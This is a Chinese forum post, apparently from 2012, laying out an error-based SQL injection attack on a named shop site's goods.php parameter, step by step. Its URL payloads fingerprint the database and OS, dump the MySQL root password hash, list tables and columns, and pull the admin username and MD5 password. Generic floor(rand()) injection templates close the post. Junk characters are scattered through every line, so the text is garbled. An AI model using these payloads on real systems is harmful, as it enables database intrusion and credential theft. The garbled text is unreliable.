判断版本号 1 t4 c/ X5 j( {; @0 ^6 i! e0 N! Q/ |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( l5 k, `4 g6 L6 p
) r6 a& _" w" {: z n) G+ w判断系统
; p. x% W8 c9 K6 E6 r, W
; V5 N+ W0 z4 N3 _: v# A) L$ Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" k9 r/ c; m& x. {
, E, |) b. p, [, z, f( F
' L A" f e% T) \+ _' o1 ^2 r
" y! r. A* e* M5 |! ]2 w当前 user()( T9 w) |8 S; e: O( i- C" x! ?- q* K
7 {( Y* K' R( a$ H! ^. z8 jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 }, {( t6 u3 O' |" c- H* m, K# d3 Q# e: g
- t+ v. g8 d9 l7 R* `9 H
( {( T$ ]5 ]( X当前 database()
2 M# W9 g4 ~6 V: r' nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! X1 ^9 j; H( X8 b2 l. C
! H! D+ r/ ?" K2 [
H6 X8 P) x8 }& i3 E5 u
) K. d. W1 \, f: F; U3 h- U& f, g5 c& K* s/ b+ r* P
root hash8 x; f2 D3 l1 E
- C* M3 }8 F1 i0 Q8 t7 O1 b$ s5 C
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 h8 B* h/ l8 a" x8 r! R8 }) s, \2 j0 w* k& r
6 u: m( u# I. n. ^- L2 R$ j: C" d- A/ S- k! J% s. L' T2 z2 S
当前 数据库表名
: B* F. t2 f# H' Y# p) {7 m h
, V$ w, R: ?: ^, r, J1 _# M. Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* m, U+ k5 J! Z9 R4 ~
9 I! f2 y" B ]3 C; g
4 E" U, W. O+ a7 J) Z1 {$ ~ i N7 |/ c5 s! [
当前 数据库 user_name 字段( I& a8 |/ k+ I& A7 U. a
& d' v* l+ T: `0 B" l0 _
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 u3 @& v, r7 ]+ h2 Q; `( h; Q5 x; z5 g7 _7 B1 Q5 a. X/ v( X
当前 数据库 字段 password5 E5 H2 c8 S8 x4 v/ S
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 A& ^$ d& e% |
. z. w1 X/ u$ z) R, s: m0 ~4 z5 ~4 T. s/ N ?" k3 @
+ U9 B/ |' c/ a8 u" z获得 admin passwd(md5), {5 Y- P3 ]2 W$ V
l- x% C$ R$ ]4 V% @0 ^, g
# }* `; q3 _/ w/ r7 K% ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ u% [! Z& W" L2 [* c+ v' H- o5 B* u
N. |6 b) Y1 T% Y/ l! }5 t( o报错注射- V5 c8 R, b/ P9 t) N( a3 L) R& u
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)4 @) _ \; M' S" D
( E, t# b8 s" I9 r' e Q
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a): m! Y8 k5 n6 @# ^ K- W
1 d: Q9 }8 D1 R1 z) v1 I+ P3 [" d+ Sand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对